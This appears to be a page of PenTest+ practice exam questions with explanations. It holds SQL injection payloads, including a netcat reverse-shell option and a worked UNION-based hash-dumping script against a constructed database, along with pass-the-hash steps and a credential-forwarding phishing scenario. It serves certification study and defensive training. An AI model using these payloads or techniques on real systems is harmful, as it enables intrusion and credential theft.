CompTIA PT0-002 Practice Test - Questions Answers, Page 27

Given the following code:

Which of the following data structures is "systems"?

A. A tuple
B. A tree
C. An array
D. A dictionary
Suggested answer: D

Explanation:

A dictionary is the Python data structure that stores key-value pairs, written as comma-separated pairs inside curly braces. Values are looked up by key (systems[ip]) or iterated with the keys(), values(), and items() methods. In the code, systems is a dictionary with four key-value pairs, each mapping an IP address to the operating system running on that host. A tuple is an ordered, immutable sequence written in parentheses; a tree is a hierarchical structure of nodes joined by edges from a root node down to leaf nodes; an array holds elements of a single type in contiguous memory (Python's closest equivalents are the list and the array module).
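The following is an added example, not code from the exam question, showing why a host-to-OS map like the one in the question is naturally a dictionary and what that buys a tester over a tuple. The IP addresses and OS names are constructed sample data.

```python
# Added example (not from the exam page): a host -> OS map as a dict versus a tuple.
# The addresses and OS names below are constructed sample data.

# A dict: key -> value pairs; keys (the IP addresses) are unique.
SYSTEMS = {
    "192.168.1.10": "Windows Server 2016",
    "192.168.1.11": "Windows 7",
    "192.168.1.12": "Ubuntu 20.04",
    "192.168.1.13": "Windows Server 2008 R2",
}

# The same facts as a tuple: ordered, positional and immutable.
SYSTEMS_TUPLE = tuple(SYSTEMS.items())


def os_for(systems: dict, ip: str) -> str:
    """Direct lookup by key; .get() avoids a KeyError for a host we never scanned."""
    return systems.get(ip, "unknown")


def hosts_running(systems: dict, needle: str) -> list:
    """Hosts whose OS string contains needle (case-insensitive), e.g. every Windows box."""
    return sorted(ip for ip, os_name in systems.items() if needle.lower() in os_name.lower())


def group_by_os(systems: dict) -> dict:
    """Invert the map to OS -> [hosts], which is the shape a findings report usually needs."""
    grouped = {}
    for ip, os_name in systems.items():
        grouped.setdefault(os_name, []).append(ip)
    return grouped


def record_host(systems: dict, ip: str, os_name: str) -> int:
    """Dict assignment inserts or overwrites, so a rescan of the same IP never duplicates it.
    Returns the number of distinct hosts afterwards."""
    systems[ip] = os_name
    return len(systems)


def tuple_is_immutable(items: tuple) -> bool:
    """A tuple cannot be updated in place; a rescan would need a whole new object."""
    try:
        items[0] = ("192.168.1.10", "Windows Server 2019")
        return False
    except TypeError:
        return True
```

The inverted map from group_by_os is what the patch-management and EternalBlue findings later on this page are built from: every host keyed by an OS that is out of support is a candidate for the same missing update.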

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
Suggested answer: D

Explanation:

Patch management is the process of identifying, testing, and deploying security updates so that known vulnerabilities are closed before they can be exploited. EternalBlue exploits a flaw in SMBv1 that Microsoft fixed in March 2017 with the MS17-010 security update; installing that update on the vulnerable host removes the vulnerability itself, and an ongoing patch management program keeps the rest of the environment from drifting back into the same state. A tester can confirm the fix by re-running the check that flagged the host (for example Nmap's smb-vuln-ms17-010 script); disabling SMBv1 and blocking TCP 445 from untrusted networks are useful compensating controls, but not substitutes for the patch.

Network segmentation (A) limits how far a compromise can spread by separating the network into smaller, isolated segments, but it leaves the host itself exploitable. Key rotation (B) is the periodic replacement of cryptographic keys, which protects against attacks that rely on stolen or compromised keys; it has no bearing on an SMB code-execution flaw.

Encrypted passwords (C) protect stored credentials if a data store is breached, but they do nothing to stop an attacker from exploiting EternalBlue, which needs no credentials at all.

Reference: CompTIA PenTest+ Certification Guide, Chapter 1: Pre-engagement Interactions, Page 21.

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted.

Which of the following BEST identifies this concept?

A. Statement of work
B. Program scope
C. Non-disclosure agreement
D. Rules of engagement
Suggested answer: D

Explanation:

Rules of engagement (ROE) is a document that outlines the specific guidelines and limitations of a penetration test engagement. The document is agreed upon by both the penetration testing team and the client and sets expectations for how the test will be conducted, what systems are in scope, what types of attacks are allowed, and any other parameters that need to be defined. ROE helps to ensure that the engagement is conducted safely, ethically, and with minimal disruption to the client's operations.

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.
Suggested answer: D

Explanation:

Mimikatz is a credential-dumping tool that reads logon secrets, including NTLM hashes, from LSASS memory, and its sekurlsa::pth module starts a new process whose logon session authenticates with a supplied NTLM hash instead of a password. From that process the tester can run PsExec, the Sysinternals remote-execution utility, against other hosts: PsExec authenticates over SMB with the injected hash and installs a temporary service on the target to run commands. Persistence comes from what PsExec is used to deploy (for example a service or scheduled task that starts an agent at boot), not from a single remote shell, so that step should be planned within the rules of engagement. Hashcat (B) cracks hashes rather than passing them; Patator (A) is a brute-forcer and Responder is a poisoning and capture tool; a bind shell (C) is a payload, not an authentication method.

"A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass-the-hash capability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186)

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A. A vulnerability scan
B. A WHOIS lookup
C. A packet capture
D. An Nmap scan
Suggested answer: A

Explanation:

A vulnerability scan is a type of penetration testing tool that is used to scan a network for vulnerabilities. A vulnerability scan can detect misconfigurations, missing patches, and other security issues that could be exploited by attackers. In this case, the output shows that 100 hosts had findings due to improper patch management, which means that the tester performed a vulnerability scan.

After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U ''
C. smbget //192.168.100.56/web -U ''
D. smbclient //192.168.100.56/web -U '' -N
Suggested answer: D

Explanation:

The enum4linux output (not reproduced here) shows that 192.168.100.56 exposes SMB shares, among them one named web, and that the host accepted an anonymous (null) session during enumeration. The natural next step is to connect to that share and inspect its contents. smbclient //192.168.100.56/web -U '' -N opens an interactive session with an empty username, and -N suppresses the password prompt, so it succeeds without credentials wherever the share permits guest access. net rpc share (B) only lists the shares again, repeating what enum4linux already reported; smbget (C) downloads files from a path the tester does not yet know rather than browsing the share; smbspool (A) is the CUPS backend for sending print jobs to an SMB printer, and its option also points at a different address (192.160.100.56).

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning
B. Watering-hole attack
C. Impersonation
D. Spear phishing
Suggested answer: D

Explanation:

Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT system administrator, so they can use this information to craft a highly targeted spear phishing attack to try and gain access to the target system.

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

Which of the following should the penetration tester attempt NEXT?

A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
B. http://company.com/catalog.asp?productid=22' OR 1=1 --
C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
Suggested answer: C

Explanation:

The five-second delay proves that the parameter reaches a SQL Server query unescaped, but a time-based probe returns no data. A UNION SELECT appends a second query to the original so that rows chosen by the tester are rendered where product details would be; it only parses when both sides return the same number of columns (with compatible types), which is why the payload starts with placeholder values 1,2,3 and is adjusted until the page renders instead of erroring. Once the column count is known, the placeholders are swapped for columns from other tables, such as usernames and password hashes. Option B only tests for a Boolean bypass, which the delay has already established; option A uses a colon where a semicolon is required, and xp_cmdshell is disabled by default and belongs to a later, riskier stage; option D is an operating-system command that a database query will not execute.
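The following is an added example, not code from the exam page, that carries the UNION step through against a constructed catalog. SQLite stands in for the SQL Server behind catalog.asp, so the WAITFOR DELAY probe itself is not reproduced (SQLite has no equivalent); the table names, products, users and hashes are all made up for the demonstration.

```python
# Added example (not from the exam page): column-count discovery and data extraction
# with UNION SELECT against a constructed SQLite catalog, plus the parameterized fix.
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed catalog plus a users table the product page never displays."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (22, 'Gecko Mug', 9.99), (23, 'Gecko Shirt', 19.99);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99'),
                                 (2, 'jsmith', 'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return db


def lookup_vulnerable(db: sqlite3.Connection, productid: str) -> list:
    """Same defect as catalog.asp: the parameter is spliced into the statement text."""
    sql = f"SELECT name, price FROM products WHERE id = '{productid}'"
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, productid: str) -> list:
    """Hardened form: a bound parameter is data, so a payload is just a non-matching id."""
    return db.execute("SELECT name, price FROM products WHERE id = ?", (productid,)).fetchall()


def find_column_count(db: sqlite3.Connection, max_cols: int = 10):
    """Step 1: a UNION only parses when both sides have the same number of columns, so
    grow 'UNION SELECT NULL,...' until the database stops raising an error."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            lookup_vulnerable(db, f"22' UNION SELECT {nulls} --")
            return n
        except sqlite3.Error:
            continue  # column-count mismatch; try one more
    return None


def dump_users(db: sqlite3.Connection) -> list:
    """Step 2: with the count known, substitute columns from a table of the tester's
    choosing; the stolen rows come back through the same product listing."""
    return lookup_vulnerable(db, "22' UNION SELECT username, password_hash FROM users --")
```

NULL is used for the placeholders because it is compatible with every column type; the exam's 1,2,3 works the same way on SQL Server once the count is right, and the visible numbers then show which column positions are rendered on the page.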

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

A. window.location.= 'https://evilcorp.com'
B. crossDomain: true
C. geturlparameter ('username')
D. redirectUrl = 'https://example.com'

Suggested answer: B

Explanation:

The credential-harvesting page is served from example.com but must send the captured username and password to a server the engineer controls, which is a different origin. In the jQuery $.ajax() call that forwards the credentials (in the code the question refers to), crossDomain: true tells jQuery to treat the request as a cross-origin call rather than a same-origin one. The other options either redirect the victim (A and D) or only read a parameter (C) and do nothing to move the credentials off the page. The browser's same-origin policy still applies: for a simple form-encoded POST the request reaches the attacker's server even if the browser refuses to expose the response, while a request that triggers a CORS preflight is only sent if that server answers with permissive CORS headers.

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

A. The web server is using a WAF.
B. The web server is behind a load balancer.
C. The web server is redirecting the requests.
D. The local antivirus on the web server is rejecting the connection.
Suggested answer: A

Explanation:

A Web Application Firewall (WAF) is designed to monitor, filter or block traffic to a web application. A WAF will monitor incoming and outgoing traffic from a web application and is often used to protect web servers from attacks such as SQL Injection, Cross-Site Scripting (XSS), and other forms of attacks.

When a WAF decides a request is malicious, a common response is to drop the request and tear down the TCP connection with a RST rather than return an HTTP error, so a tester probing a protected site sees resets only for requests that carry attack-like payloads. A quick way to confirm this is to send a plain request and then the same request with an obvious signature (such as a SQL injection string) and compare: a normal response to the first and a reset to the second points to inline filtering, whereas a load balancer or a redirect would answer both requests normally. Therefore the most likely reason for the TCP resets is a WAF in front of the web server.
